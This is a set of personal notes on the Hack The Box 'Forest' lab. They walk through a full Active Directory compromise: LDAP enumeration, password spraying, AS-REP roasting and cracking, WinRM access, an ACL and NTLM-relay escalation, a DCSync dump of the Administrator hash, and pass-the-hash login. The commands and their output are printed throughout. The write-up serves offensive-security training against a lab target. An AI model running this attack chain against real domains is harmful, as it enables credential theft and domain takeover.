HTB Forest

Hack the box notes

LDAP 389/TCP - ldapsearch

LDAP normally provides verbose information about the AD. And if anonymous bind is allowed, we can query many of good AD information, such as user information.

Anonymous (NULL) Bind

# ldapsearch null bind
(-x ) simple (anonymous) authentication, otherwise MD5
(-s ) scope
(-b ) basedn .. base domain name

ldapsearch -H ldap://10.129.95.210 -x -s base
ldapsearch -H ldap://10.129.95.210:389 -x -b "dc=htb,dc=local"

# Account policy 
 
 [+] Password Info for Domain: HTB
        [+] Minimum password length: 7
        [+] Account Lockout Threshold: None


# Accounts enumeration
ldapsearch -H ldap://10.129.95.210:389 -x -b DC=htb,DC=local "(objectClass=person)" | grep "sAMAccountName:"
...
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi

Remote Management Users

ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"

Windapsearch

GitHub - ropnop/windapsearch: Python script to enumerate users, groups and computers from a Windows domain through LDAP queriesGitHub

# install 
git clone https://github.com/ropnop/windapsearch
apt-get install libsasl
pip install ldap
pip install python-ldap     

python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.95.210
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None
[+] Enumerating all AD users
[+]     Found 28 users: 

python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 --custom "objectClass=*"

Kerberos - 88/TCP

kerbrute

Releases · ropnop/kerbruteGitHub

Brute force and enumerate valid AAD accounts with kerbrute

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

./kerbrute_linux_amd64 passwordspray -d htb.local --dc 10.129.95.210 ./user.txt 'pass' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/06/23 - Ronnie Flathers @ropnop

2023/06/06 14:15:55 >  Using KDC(s):
2023/06/06 14:15:55 >   10.129.95.210:88

2023/06/06 14:15:55 >  [!] svc-alfresco@htb.local:pass - Got AS-REP (no pre-auth) but couldn't decrypt - bad password                                                                                         
2023/06/06 14:15:55 >  [!] lucinda@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] mark@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] andy@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] santi@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] sebastien@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  Done! Tested 6 logins (0 successes) in 0.324 seconds

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

Kerberoasting

Identify Kerboros Service Principal Names (SPN) tight to the account using Impacket's GetSPN

# list SPNs tight to account
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName>

# ticket to crack
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName> --request

the response contains kerberos hash which can be cracked offlien with hashcat or john

impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210

# store it into file: svc_hash
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1

Hashcat - Cracking Kerberos ticket

hashcat -m 13100 -a 0 svc_hash passwordlist.txt --force --show

Johne The Ripper - Cracking Kerberos ticket

john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash 

Crackmapexec - Test login to account

crackmapexec smb 10.129.95.210 -d htb.local -u svc-alfresco -p s3rvice

WinRM

WinRM (5985/TCP) — Microsoft implementation of WS-Management protocol. This can allow a remote connection via PowerShell.

Look for remote management user group

ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"

net rpc group members 'Privileged IT Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1

net rpc group members 'Service Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1

Evil-WinRM

git clone https://github.com/Hackplayers/evil-winrm

ruby evil-winrm.rb -i 10.129.95.210 -u svc-alfresco -p s3rvice

net group /domain

Abusing privileges of "Account Operators" see bellow in BloodHound inspection we continue with the privilege escalation by adding new user using DSYNC attack.

DSYNC Attack thhrough - Exchange Trusted Subsystem group

Escalating privileges with ACLs in Active DirectoryFox-IT International blog

Create domain account

PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain

Impacket NTLM Relay

Impacket’s ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).

# kali terminal1
cd /usr/share/doc/python3-impacket/examples/
./ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss

DSYNC attack - Dump Administrator LM/NT hash

# kali terminal2
secretsdump.py htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator

# kali terminal2
impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up... 

PSEXEC - Login as administrator using hash

impact-psexec htb.local/administrator@10.129.95.210 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

EOF The following BloodHound analysis....

BloodHound Kali - igestor based on impacket

Python based igestor based on impackets

GitHub - fox-it/BloodHound.py: A Python based ingestor for BloodHoundGitHub

pip install impacter
pip install ldap3
pip install bloodhound

git clone https://github.com/fox-it/BloodHound.py.git

./bloodhound.py -u svc-alfresco -p s3rvice -d htb.local -ns 10.129.95.210

BloodHound and Neo4j

Initial setup

apt install bloodhound
apt install neo4j

neo4j console

Start neo4j console and visit first http://localhost:7474 password wizard

Start

./BloodHound --no-sandbox

Import data (upload icon)

Set alfresco as owned

Click on alfresco and chose "Unrolled membership"

We can see the user is part of "Account Operators" group. Members of this group can create and modify most types of accounts.

Go back to DSYNC attack.